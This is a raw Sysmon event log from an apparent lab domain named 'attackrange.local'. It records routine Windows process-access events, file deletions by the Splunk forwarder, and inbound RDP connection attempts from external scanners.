10341000x800000000000000080416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-8105-00000000BB01}8362064C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000080414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000080413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fc6e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3fbe5|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3f049|C:\Windows\System32\modernexecserver.dll+3fd2f|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f6a2|C:\Windows\System32\modernexecserver.dll+3fd1e|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fd0b|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3fdee|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4246100C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f400|C:\Windows\System32\modernexecserver.dll+47a8c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000080406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-8105-00000000BB01}836ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\ActionCenterCache\microsoft-explorer-notification--d1f6275c-b9a0-a25e-7f73-51b54487be4c-_8_0.pngMD5=00E5FCFD833151F7CBDE607E2F7AFEB4,SHA256=B80192AAABE007BAECD0603E3CE183E9D554B8A6B0411D20716ACFA086AE3035,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4246100C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+478ab|C:\Windows\System32\modernexecserver.dll+476e0|C:\Windows\System32\modernexecserver.dll+4763b|C:\Windows\System32\modernexecserver.dll+3985d|C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll+1781|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 10341000x800000000000000080404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fc6e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3fbe5|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3f049|C:\Windows\System32\modernexecserver.dll+3fd2f|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f6a2|C:\Windows\System32\modernexecserver.dll+3fd1e|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fd0b|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3fdee|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4242312C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f400|C:\Windows\System32\modernexecserver.dll+47a8c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000080397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.591{A7A01FEF-C0A6-607E-7805-00000000BB01}4242312C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+478ab|C:\Windows\System32\modernexecserver.dll+476e0|C:\Windows\System32\modernexecserver.dll+4763b|C:\Windows\System32\modernexecserver.dll+3985d|C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll+1781|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 23542300x800000000000000080396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.310{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57BB7C317FE6CB12A2037045F67247FE,SHA256=8AA7729AFD34C75C3E71EFB05D99CED7CE3D1813F0991522E7ED1403C884A7E3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.635{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-34921-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000080394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.535{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55805-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000080393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.247{A7A01FEF-EBFF-607E-270E-00000000BB01}6624ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\tmp7AA1.tmpMD5=9E936C2078B286132CD6B9C8602FD17A,SHA256=FA994BADB1E90B2629E0D955572CA57EFE97169D20D6B4957E2F830E3680DA9E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.107{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1F-607E-9A0E-00000000BB01}4224C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.091{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC1F-607E-9A0E-00000000BB01}4224C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.091{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1F-607E-9A0E-00000000BB01}4224C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050567Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:39.872{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=542877315E366EAA8905CE5FD67F50ED,SHA256=54D2ED847410A639B922210686BB1E2FF79188605764F0DC2E112591662B6782,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050566Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 